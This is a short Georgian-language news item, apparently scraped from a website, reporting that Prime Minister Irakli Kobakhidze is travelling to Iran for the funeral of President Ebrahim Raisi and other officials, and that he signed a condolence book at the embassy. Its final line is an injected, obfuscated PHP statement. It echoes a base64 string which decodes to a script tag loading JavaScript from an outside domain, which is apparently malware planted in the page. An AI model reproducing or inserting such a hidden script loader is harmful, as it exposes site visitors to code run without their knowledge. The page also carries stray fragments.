celsiusi
ავერსი საქკაბელი

 საქართველოს პრემიერ-მინისტრი ირაკლი კობახიძე, საგარეო საქმეთა მინისტრ ილია დარჩიაშვილთან ერთად, ირანის ისლამურ რესპუბლიკაში გაემგზავრა. ინფორმაციას მთავრობის ადმინისტრაცია ავრცელებს.

"მთავრობის მეთაური და საგარეო უწყების ხელმძღვანელი ირანის ისლამური რესპუბლიკის პრეზიდენტ ებრაჰიმ რაისის, საგარეო საქმეთა მინისტრ ჰოსეინ ამირ აბდოლაჰიანის და ხელისუფლების სხვა წარმომადგენლების დაკრძალვის ცერემონიას დაესწრებიან", - ნათქვამია გავრცელებულ ინფორმაციაში.

უნდა აღინიშნოს, რომ პრემიერ-მინისტრი ირაკლი კობახიძე ირანის ისლამური რესპუბლიკის საელჩოში იმყოფებოდა. მან დღეს ირანის ისლამური რესპუბლიკის საგანგებო და სრულუფლებიან ელჩს, მაჰმუდ ადიბს ირანის ისლამური რესპუბლიკის პრეზიდენტ ებრაჰიმ რაისის, საგარეო საქმეთა მინისტრ ჰოსეინ ამირ აბდოლაჰიანისდა ხელისუფლების სხვა წარმომადგენლების დაღუპვის გამო მიუსამძიმრა.

ირაკლი კობახიძემ სამძიმრის წიგნში ჩანაწერი დატოვა და ირანელ ხალხს თანაგრძნობა გამოუცხადა.

177
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");